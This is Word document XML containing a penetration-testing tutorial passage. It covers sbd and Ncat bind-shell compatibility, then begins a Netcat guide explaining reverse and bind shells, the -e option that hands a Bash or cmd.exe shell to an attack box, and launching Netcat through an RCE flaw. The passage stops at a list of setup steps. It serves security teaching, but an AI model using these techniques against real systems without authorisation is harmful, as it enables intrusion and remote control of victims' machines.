        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Something to note is the fact that when Netcat or Ncat tries to connect to an sbd listener, authentication fails and it gets no response when commands are sent. Same goes for when there is a Ncat SSL listener and Netcat or Ncat attempts to gain a bind shell. Specifying the </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>--ssl </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>option also causes a Connection Refused error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063CEB9" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FD85D6" wp14:editId="79045F6B">
            <wp:extent cx="16249650" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture 3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for po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249650" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE5557" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37CD95AA" wp14:editId="64F37618">
            <wp:extent cx="16249650" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31" name="Picture 3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for po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249650" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1CC50B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>sbd and Ncat don’t mix!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C01A0E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="468" w:after="0" w:line="600" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Further Digging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B44382" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="206" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Offensive Netcat/Ncat: </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>sbd: </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://tools.kali.org/maintaining-access/sbd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>Netcat/Ncat/sbd: </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://neilsec.com/knowledge/netcat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B494682" w14:textId="77777777" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="78DEC75F" w14:textId="6B0660AA" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="6EB753D0" w14:textId="0A174EB9" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="3B33C1EF" w14:textId="4BA3C68A" w:rsidR="00835152" w:rsidRDefault="00835152"/>
    <w:p w14:paraId="7F2EB32B"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3A4149"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A4149"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">In part 1 of the Hacking with Netcat tutorials we have learned the very basics of Netcat. Now it is time to dive deeper into the most popular and common usage of Netcat: Setting up bind shells and reverse shells. In this tutorial we will be learning about the difference between a bind shell and a reverse shell and how to use them. Quite often Netcat is not present on systems as it could be considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A4149"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>as a potential security issue. In these cases we will learn about how to use other tools and programming languages than Netcat which replaces some functionality to setup a reverse shell. Programming and script languages like Python, PHP, Perl and Bash are great alternatives. We will conclude this tutorial with how to use bind shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C8377"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In this tutorial we will be learning how to use Netcat for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C3609" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61CDE3" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05245669"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We will demonstrate these techniques using a couple virtual machines running Linux and through some visualization. The hacking with Netcat tutorials will be divided in the following 3 parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E139E8F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="E54E53"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Hacking with Netcat part 1: The Basics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31B6B86E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="E54E53"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Hacking with Netcat part 2: Bind and Reverse shells</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49CE1DB1" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="E54E53"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Hacking with Netcat part 3: Advanced Netcat techniques</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0355DEF4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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If you are not familiar with Netcat and haven’t read the </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="E54E53"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>first part of Hacking with Netcat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> we recommend you to read that first. Let’s move on and have a look at how to use bind shells and reverse shell in Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1056ED57" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBED02"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A very popular usage of Netcat and probably the most common use from penetration testing perspective are reverse shells and bind shells. A reverse shell is a shell initiated from the target host back to the attack box which is in a listening state to pick up the shell. A bind shell is setup on the target host and binds to a specific port to listens for an incoming connection from the attack box. In malicious software a bind shell is often revered to as a backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D204DBB"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In the following paragraphs we will be demonstrating the use of bind and reverse shell. We will be using port 4444 throughout this tutorial but please note that this can be any open port instead. In fact, often you need to use more common ports like 80 and 443 to setup reverse shells as it is more common for these ports to be open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52B6E7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Setting up Netcat Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3FB00F"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Let’s have a look at the visualization of a reverse Netcat shell to get a better understanding of how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951F7E8" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03939900" wp14:editId="5061598F">
            <wp:extent cx="7988300" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="32" name="Picture 32" descr="netcat-reverse-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etcat-reverse-shell"/>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988300" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A04B90" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat Reverse Shell explained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F8357"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In this example the target connects back to the attack box using port 4444. The –e option sends back a Bash shell to the attack box. Please note that we can also use the –e option with cmd.exe on Windows. Let’s say we have found a remote code execution (RCE) vulnerability on the target host. We can than issue the Netcat command with –e on the target host and initiate a reverse shell with Netcat to issue commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE8B01"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Let’s have a look at how this works with the following example where we’ve setup 2 Linux systems with Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A877C82" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Netcat reverse shell example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC04438"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In order to setup a Netcat reverse shell we need to follow the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05ECA4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
